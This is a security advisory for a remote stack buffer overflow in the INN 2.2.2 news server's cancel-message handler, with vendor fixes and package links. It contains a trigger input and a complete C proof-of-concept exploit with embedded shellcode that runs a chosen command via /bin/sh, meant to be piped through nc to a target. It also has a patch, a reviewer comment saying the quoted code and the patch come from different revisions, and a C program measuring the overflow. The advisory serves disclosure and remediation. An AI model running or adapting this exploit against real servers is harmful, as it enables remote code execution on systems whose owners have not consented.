COMMAND
innd
SYSTEMS AFFECTED
INND 2.2.2
PROBLEM
Michal Zalewski found the following. The newest innd 2.2.2, probably
the most popular Usenet news server (as well as previous versions),
contains a remotely exploitable, trivial on-stack buffer overflow in
the control article handler.
Offending piece of code (in innd/art.c, function ARTcancelverify):
if (!EQ(local, p)) {
files = NULL;
(void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
p, MessageID, local);
ARTlog(Data, ART_REJECT, buff);
}
Here buff (a local stack buffer) is SMBUF bytes long (that is, 256
bytes), but MessageID can be up to almost 1000 bytes long.
This code is reached when a cancel request is sent to the special
newsgroup (called 'control') and the cancel request contains a valid
Message-ID, but the From/Sender fields differ between the cancel
request and the original posting.
How to exploit it? It could be a problem for script kiddies, as the
Message-ID is strictly checked for non-printable characters etc.
But hey, the Message-ID can be used only as padding, and then we
can overwrite the return address with the From/Sender address of the
cancel post! This field is not verified in any fascist way. Shellcode?
It can be placed anywhere; quite big portions of the cancel post are
lying in accessible memory when the overflow happens.
Sample input ("LONGBUFFER" = around 500-600 bytes of AAAs..., which
has to be the same every time):
-- input -
201 XXX InterNetNews NNRP server INN 2.2 23-Oct-1998 ready (posting ok)
mode reader
group pl.test
post
Message-ID: <none@LONGBUFFER>
From: <test@polbox.com>
Sender: <test@polbox.com>
Newsgroups: pl.test
testing
. <- single dot, comment to avoid mail transfer problems
group control
post
Message-ID: <some-random-msgid@test.pl>
Approved: <approver@approving.net>
From: <sucker@free.net.pl>
Sender: <sucker@free.net.pl>
Control: cancel <none@LONGBUFFER>
Subject: cmsg cancel <none@LONGBUFFER>
Newsgroups: control
Damn, cancel it.
. <- single dot
quit
-- EOF --
If innd/nnrp is running under a debugger or tracer like strace, you'll
see that the child process responsible for request handling dies with
SIGSEGV. Nice.
Wojciech Purczynski wrote a proof-of-concept exploit. It is rather
trivial to exploit as we have plenty of room to put our shellcode.
/*
* inndx: innd remote 'news' user/group exploit
*
* Written on 12th June 2000 by Wojciech Purczynski
* <wp@elzabsoft.pl> cliph/ircnet
*
* Bug found by Michal Zalewski.
*
* Tested on innd-2.2.2-3 default installation on RedHat 6.2.
*
* Usage:
* ./inndx [command [offset]]|nc -i 1 target.host 119
*/
#include <stdio.h>
#include <stdlib.h> /* atoi */
#include <string.h> /* strlen, memset, strcpy, strcat */
#include <unistd.h>
#define RETADDR 0x8138004 /* we're jumping into the body of cancel msg */
#define BUFSIZE (256+2*4+4) /* buff + EBP + EIP + Data */
#define JUNKSIZE strlen("\"\" wants to cancel <> by \"")
#define NOP 0x90
#define FAKEPTR 0xbffff1c0
#define COMMAND "echo U have b33n h@x0r3d hahahah|mail root"
#define BODYSIZE 999
/* Code written by me */
char * run_command=
"\xeb\x3d\x5e\x89\xf7\x31\xc0\x47"
"\x80\x3f\xff\x75\xfa\x88\x07\x47"
"\x89\x37\x89\xf3\x46\x80\x3e\x2e"
"\x75\xfa\x88\x06\x46\x89\x77\x04"
"\x46\x80\x3e\x2e\x75\xfa\x88\x06"
"\x46\x89\x77\x08\x89\x47\x0c\x89"
"\xf9\x8d\x57\x0c\xb0\x0b\xcd\x80"
"\x89\xc3\x31\xc0\x40\xcd\x80\xe8"
"\xbe\xff\xff\xff/bin/sh.-c.";
int main(int argc, char *argv[])
{
int retaddr=RETADDR;
char messageid[256];
char sender[16];
char body[BODYSIZE];
char * command=COMMAND;
int midsize;
int i;
if (argc>1) command=argv[1];
if (argc>2) retaddr+=atoi(argv[2]);
memset(sender, 0, sizeof(sender));
strcpy(sender+0, "a@a."); /* EBP */
*(long*)(sender+4)=(long)retaddr; /* EIP */
*(long*)(sender+8)=(long)RETADDR+1000; /* Data */
memset(messageid, 'a', sizeof(messageid));
sprintf(messageid, "%s@a", tmpnam(NULL)+9);
messageid[strlen(messageid)]='a';
messageid[BUFSIZE-JUNKSIZE-5-strlen(sender)]=0;
memset(body, NOP, sizeof(body));
strcpy(body+sizeof(body)-strlen(run_command)-strlen(command)-2, run_command);
strcat(body, command);
strcat(body, "\xff");
fprintf(stderr, "RETADDR=%p\n", retaddr);
fprintf(stderr, "COMMAND=%s\n", command);
printf("mode reader\r\ngroup test\r\npost\r\n");
printf("Message-ID: <%s>\r\n", messageid);
printf("From: %s\r\nSender: %s\r\n", sender, sender);
printf("Newsgroups: test\r\n");
printf("Subject: blah\r\n");
printf("\r\nblah\r\n.\r\n");
printf("group control\r\npost\r\n");
printf("Message-ID: <%s@test>\r\n", tmpnam(NULL)+9);
printf("From: a@b.c\r\nSender: a@b.c\r\n");
printf("Control: cancel <%s>\r\n", messageid);
printf("Subject: cmsg cancel <%s>\r\n", messageid);
printf("Newsgroups: control\r\n\r\n%s\r\n.\r\nquit\r\n", body);
}
SOLUTION
Note that this code is only ever executed if the option
"verifycancels" is enabled in inn.conf. This is *not* the upstream
default, and has been recommended against for some time now since
it really doesn't do any real good. It is, however, enabled by default
in Red Hat, and is usually enabled on live innd sites.
INN 1.7.x and earlier are not affected by this. The vulnerable
code appeared in the 2.x branch. Obvious fix:
--- inn/innd/art.c 2000/06/05 22:39:52 1.142
+++ inn/innd/art.c 2000/06/06 19:31:56 1.143
@@ -1042,7 +1042,7 @@
HeaderCleanFrom(p);
if (!EQ(q, p)) {
token = NULL;
- (void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
+ (void)sprintf(buff, "\"%.50s\" wants to cancel %.70s by \"%.50s\"",
p, MessageID, q);
ARTlog(Data, ART_REJECT, buff);
}
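Review bot: The `%.70s` precision on the `+` line bounds the worst-case line at 1+50+1+17+70+4+1+50+1 = 195 bytes, which fits the 256-byte SMBUF `buff`, but the bound lives in the format string rather than in the destination size; writing the line with `snprintf(buff, sizeof buff, ...)` would keep the call safe even if the precisions or SMBUF change later. Readers should also note that this hunk (art.c 1.142 to 1.143) uses `q` and `token` where the snippet quoted under PROBLEM uses `local` and `files`, so the quoted code and the patch come from different revisions of ARTcancelverify and the patch must be applied to the tree it was generated against.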
Those who want to run with verifycancels turned on should get the
latest STABLE snapshot from /isc/inn/snapshots on ftp.isc.org; 2.2.3
fixes this. The workaround in the meantime is to turn off
verifycancels in inn.conf. This whole block of code will likely be
removed in INN 2.4.
Note that due to the syntax checking INN performs on message IDs,
this will be mildly difficult to exploit, although it is probably
at least theoretically possible.
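The overflow and the fix side by side, as an added C example that is not part of the advisory or of INN's code: it measures how many bytes the original ARTcancelverify format needs for a 1000-byte Message-ID against the 256-byte SMBUF buffer, shows that the `%.70s` precision from the 2.2.3 patch caps the worst case at 195 bytes, and adds an snprintf() variant whose bound is the destination size itself. SMBUF=256 and the 1000-byte Message-ID figure are the advisory's; the function names and the sample addresses are assumptions.

```c
/* Added example, not INN's code: measures what the ARTcancelverify format
 * needs for an oversized Message-ID and shows the 2.2.3 bound and an
 * snprintf() variant. SMBUF=256 and the ~1000-byte ID are from the advisory. */
#include <stdio.h>
#include <string.h>

#define SMBUF 256
#define MAX_MSGID 1000
/* Constructed sample: a Message-ID of MAX_MSGID 'A's, like the LONGBUFFER above. */
const char *long_msgid(void)
{
    static char m[MAX_MSGID + 1];
    memset(m, 'A', MAX_MSGID);
    m[MAX_MSGID] = '\0';
    return m;
}

/* Bytes the vulnerable format would write (MessageID untruncated); a zero-size
 * snprintf() returns the length without touching any buffer. */
size_t vuln_needed_len(const char *local, const char *msgid, const char *p)
{
    int n = snprintf(NULL, 0, "\"%.50s\" wants to cancel %s by \"%.50s\"", p, msgid, local);
    return n < 0 ? 0 : (size_t)n;
}

/* Bytes the INN 2.2.3 format writes: MessageID capped at 70, so the worst case
 * is 1+50+1+17+70+4+1+50+1 = 195, always inside SMBUF. */
size_t fixed_needed_len(const char *local, const char *msgid, const char *p)
{
    int n = snprintf(NULL, 0, "\"%.50s\" wants to cancel %.70s by \"%.50s\"", p, msgid, local);
    return n < 0 ? 0 : (size_t)n;
}

/* Hardened variant: the destination size bounds the write regardless of the
 * precisions in the format. Returns 1 if the line was truncated, else 0. */
int safe_reject_line(char *buff, size_t buflen, const char *local, const char *msgid, const char *p)
{
    int n = snprintf(buff, buflen, "\"%.50s\" wants to cancel %.70s by \"%.50s\"", p, msgid, local);
    return n < 0 || (size_t)n >= buflen;
}

int main(void)
{
    char buff[SMBUF];
    printf("vulnerable: %zu bytes needed, SMBUF=%d\n", vuln_needed_len("a@b", long_msgid(), "c@d"), SMBUF);
    printf("fixed: %zu bytes\n", fixed_needed_len("a@b", long_msgid(), "c@d"));
    printf("truncated=%d: %s\n", safe_reject_line(buff, sizeof buff, "a@b", long_msgid(), "c@d"), buff);
    return 0;
}
```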
For Caldera Systems, the following are known to be vulnerable: OpenLinux
Desktop 2.3 (prior to inn-2.2.3), OpenLinux eServer 2.3 and
OpenLinux eBuilder (prior to inn-2.2.3), and OpenLinux eDesktop
2.4 (prior to inn-2.2.3). If you do not use INN, simply remove
the package:
rpm -e inn
In /etc/news/inn.conf replace the line:
verifycancels: true
by
verifycancels: false
and reload the INN configuration:
/usr/libexec/inn/bin/ctlinnd reload all 'security fix'
For Conectiva Linux (4.0, 4.1, 4.2 and 5.0) apply the same workaround, or install the updated packages:
i386/inews-2.2.2-3cl.i386.rpm
i386/inn-devel-2.2.2-3cl.i386.rpm
i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0
Direct links to the packages:
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/inn-devel-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/inn-devel-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/inn-devel-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/inn-devel-2.2.2-3cl.i386.rpm
For Mandrake Linux:
6.0/RPMS/inews-2.2.3-1mdk.i586.rpm
6.0/RPMS/inn-2.2.3-1mdk.i586.rpm
6.0/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
6.0/SRPMS/inn-2.2.3-1mdk.src.rpm
6.1/RPMS/inews-2.2.3-1mdk.i586.rpm
6.1/RPMS/inn-2.2.3-1mdk.i586.rpm
6.1/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
6.1/SRPMS/inn-2.2.3-1mdk.src.rpm
7.0/RPMS/inews-2.2.3-1mdk.i586.rpm
7.0/RPMS/inn-2.2.3-1mdk.i586.rpm
7.0/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
7.0/SRPMS/inn-2.2.3-1mdk.src.rpm
7.1/RPMS/inews-2.2.3-1mdk.i586.rpm
7.1/RPMS/inn-2.2.3-1mdk.i586.rpm
7.1/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
7.1/SRPMS/inn-2.2.3-1mdk.src.rpm
The Internet Software Consortium closed this hole with a bug-fix
release of INN, which is available at:
ftp://ftp.isc.org/isc/inn/inn-2.2.3.tar.gz
This will be the final release of the INN 2.2.x series, barring
major security holes. INN 2.3.0 will be released shortly, and
features a significantly different internal architecture.
Development has already begun on the INN 2.4.x series.
For Debian:
http://security.debian.org/dists/stable/updates/main/source/inn2_2.2.2.2000.01.31-4.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/inn2_2.2.2.2000.01.31-4.1.dsc
http://security.debian.org/dists/stable/updates/main/source/inn2_2.2.2.2000.01.31.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/inn2-dev_2.2.2.2000.01.31-4.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/inn2-inews_2.2.2.2000.01.31-4.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/inn2_2.2.2.2000.01.31-4.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/inn2-dev_2.2.2.2000.01.31-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/inn2-inews_2.2.2.2000.01.31-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/inn2_2.2.2.2000.01.31-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/inn2-dev_2.2.2.2000.01.31-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/inn2-inews_2.2.2.2000.01.31-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/inn2_2.2.2.2000.01.31-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/inn2-dev_2.2.2.2000.01.31-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/inn2-inews_2.2.2.2000.01.31-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/inn2_2.2.2.2000.01.31-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/inn2-dev_2.2.2.2000.01.31-4.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/inn2-inews_2.2.2.2000.01.31-4.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/inn2_2.2.2.2000.01.31-4.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/inn2-dev_2.2.2.2000.01.31-4.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/inn2-inews_2.2.2.2000.01.31-4.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/inn2_2.2.2.2000.01.31-4.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/task-news-server_2.2.2.2000.01.31-4.1_all.deb